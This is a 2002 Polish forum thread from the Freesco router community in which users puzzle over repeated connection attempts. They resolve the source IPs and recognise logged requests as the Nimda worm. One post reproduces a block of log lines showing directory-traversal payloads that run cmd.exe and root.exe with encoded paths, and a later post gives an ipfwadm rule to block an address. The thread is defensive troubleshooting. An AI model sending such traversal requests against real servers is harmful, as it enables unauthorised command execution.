Freesco, NND, CDN, EOS

http://www.freesco.pl
Dzisiaj jest czwartek, 14 sierpnia 2025, 00:58

Posty bez odpowiedzi | Aktywne tematy


Indeks witryny » Freesco Forum » Freesco

Strefa czasowa UTC+2godz.




Nowy temat Odpowiedz w temacie  Strona 1 z 1
  [ Posty: 14 ] 
  Podgląd wydruku Poprzedni temat | Następny temat 
Autor Wiadomość
Anonymous
Post: wtorek, 22 października 2002, 19:03 
khe khe
a wiec tak:

ciagle pojawiiaja sie wpisy w logach ip takie to a takie i proba polaczenia np z portem 80 (po jakiego to ni wiem) albo z innymi portami

nurtuje mnie sprawa kto to

czy jest rozsadny sposob sprawdzenia kto to bez powiadamiania tepsy itp
Na górę
  
 
Anonymous
 Tytuł:
Post: wtorek, 22 października 2002, 19:06 
a niech tam niech wszyscy wiedza

to o te ip chodzi (potrafia w ciagu 5minut nawiazac 10 prob polazenia):


207.144.202
80.5.55.76
80.49.4.23
213.118.27.96
80.49.181.82
80.14.38.92

moze sie dowqiem wreszcie
Na górę
  
 
Anonymous
 Tytuł:
Post: wtorek, 22 października 2002, 19:27 
: [/] [] ()
207.144.202    dodaj 4 liczbe
80.5.55.76     public2-with2-5-cust76.manc.broadband.ntl.com
80.49.4.23     pi23.czestochowa.sdi.tpnet.pl
213.118.27.96  D5761B60.kabel.telenet.be
80.49.181.82   pa82.bychawa.sdi.tpnet.pl
80.14.38.92    APoitiers-106-1-5-92.abo.wanadoo.fr
GeSHi © Codebox Plus
Na górę
  
 
Bolo_B
 Tytuł:
Post: wtorek, 22 października 2002, 19:31 
Offline
Użytkownik

Rejestracja: poniedziałek, 15 lipca 2002, 21:44
Posty: 565
Lokalizacja: Poznań
80.5.55.76 - public2-with2-5-cust76.manc.broadband.ntl.com
80.49.4.23 - pi23.czestochowa.sdi.tpnet.pl
213.118.27.96 - D5761B60.kabel.telenet.be
80.49.181.82 - pa82.bychawa.sdi.tpnet.pl
80.14.38.92 - APoitiers-106-1-5-92.abo.wanadoo.fr

No to ktoś co ma sdi włazi Tobie na serwer - szuka:
www jak 80 (albo control panel)
23 to telnet
22 to ssh
21 ftp

Nikt nie jest anonimowy 8) :lol:
Oby te ip nie pojawiały się teraz u mnie :?

_________________
Pozdrowienia
Bolo
Na górę
 Wyświetl profil  
 
Anonymous
 Tytuł:
Post: wtorek, 22 października 2002, 19:33 
Masz moze Apacha zainstalowanego ?
a w logach:
: [/] [] ()
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3670
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3670
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
GeSHi © Codebox Plus


Ponoc to Nimda.
Na górę
  
 
Bolo_B
 Tytuł:
Post: wtorek, 22 października 2002, 19:34 
Offline
Użytkownik

Rejestracja: poniedziałek, 15 lipca 2002, 21:44
Posty: 565
Lokalizacja: Poznań
Ach RoBoS mnie ubiegł jak sprawdzałem 8) :lol: :wink:

_________________
Pozdrowienia
Bolo
Na górę
 Wyświetl profil  
 
Anonymous
 Tytuł:
Post: wtorek, 22 października 2002, 19:36 
Ale wynik taki sam, nie jest zle. :P
Na górę
  
 
Bolo_B
 Tytuł:
Post: wtorek, 22 października 2002, 19:37 
Offline
Użytkownik

Rejestracja: poniedziałek, 15 lipca 2002, 21:44
Posty: 565
Lokalizacja: Poznań
Ten log to ewidentny włam na Win2000/NT jak mi się zdaje.

_________________
Pozdrowienia
Bolo
Na górę
 Wyświetl profil  
 
Anonymous
 Tytuł:
Post: wtorek, 22 października 2002, 19:41 
Fajny robaczek NIMDA na rodzinke NT. :lol:
To dopiero zasrywa logi. :P
Na górę
  
 
Anonymous
 Tytuł:
Post: środa, 23 października 2002, 16:41 
dziekuje
apacha ni mam

a to sdi to chyba nawet wiem kto to musze sie przejsc do kolesia
:twisted: :twisted: :twisted: :twisted: :twisted:
Na górę
  
 
Anonymous
 Tytuł:
Post: czwartek, 31 października 2002, 12:16 
Niekoniecznie mogą to być próby włamuff :)

Jak ktoś ma odpalony DC albo Imesha tudziez Kazee to tego typu kwiatki nie powinny cie martwic jeśli odnoszą się od wysokich portów [passive w DC] albo do jednego [np.411] - te aplikacje mają to do siebie że ipfwadm -M -ln głupieje ;wiem z autopsji ...
Gorzej jeśli widzisz w logach np. 1sek połączenia z serwerem FTP ktory masz odpalony na jakims niestandardowym porcie typu 999... automatycznie wtedy trzeba banana postawić na konkretne IPki :)
Na górę
  
 
C-O-N
 Tytuł: taki wirus
Post: środa, 6 listopada 2002, 14:26 
Offline
Użytkownik

Rejestracja: wtorek, 15 października 2002, 16:23
Posty: 117
Lokalizacja: Krakow
Taki wirusek jak wy piszecie dopadl tez moj serv :(
Tylko skad go dorwal to nie wiem...

Powiedzcie jak zblokowac jego ip. Czy wystarczy do rc-user
na koncu dopisac :
: [/] [] ()
ipfwadm -I -a deny -P tcp -S adres_ip -D 0/0
GeSHi © Codebox Plus


Tym blokuje pakiety a freesco ma jakas black list?
host.deny nie znalazlem :(

_________________
---------------
Best regards

C-O-N
Na górę
 Wyświetl profil  
 
Bolo_B
 Tytuł:
Post: środa, 6 listopada 2002, 15:14 
Offline
Użytkownik

Rejestracja: poniedziałek, 15 lipca 2002, 21:44
Posty: 565
Lokalizacja: Poznań
Jak chodzi o NIMDE to wystarczy, że ktoś w sieci złpie ją i będzie sie dobijać do serwera. Taki wirus może atakować ze wszystkich stron, szczególnie po LAN'ie. Może ktoś w sieci ma wirusa, albo Ty. Radze sprawdzić kompy w sieci jakimś antywirusem.

_________________
Pozdrowienia
Bolo
Na górę
 Wyświetl profil  
 
Anonymous
 Tytuł: Re: taki wirus
Post: środa, 6 listopada 2002, 15:29 
C-O-N pisze:
host.deny nie znalazlem :(

Banlist.cfg to chyba jest odpowiednik :P
Na górę
  
 
Wyświetl posty nie starsze niż:  Sortuj wg  
Nowy temat Odpowiedz w temacie  Strona 1 z 1
  [ Posty: 14 ] 

Indeks witryny » Freesco Forum » Freesco

Strefa czasowa UTC+2godz.


Kto jest online

Użytkownicy przeglądający to forum: Obecnie na forum nie ma żadnego zarejestrowanego użytkownika i 14 gości

Nie możesz tworzyć nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz dodawać załączników

Szukaj:
Przejdź do:  
cron
Technologię dostarcza phpBB® Forum Software © phpBB Group
Hosting: Compus-Net
RobertKonik.pl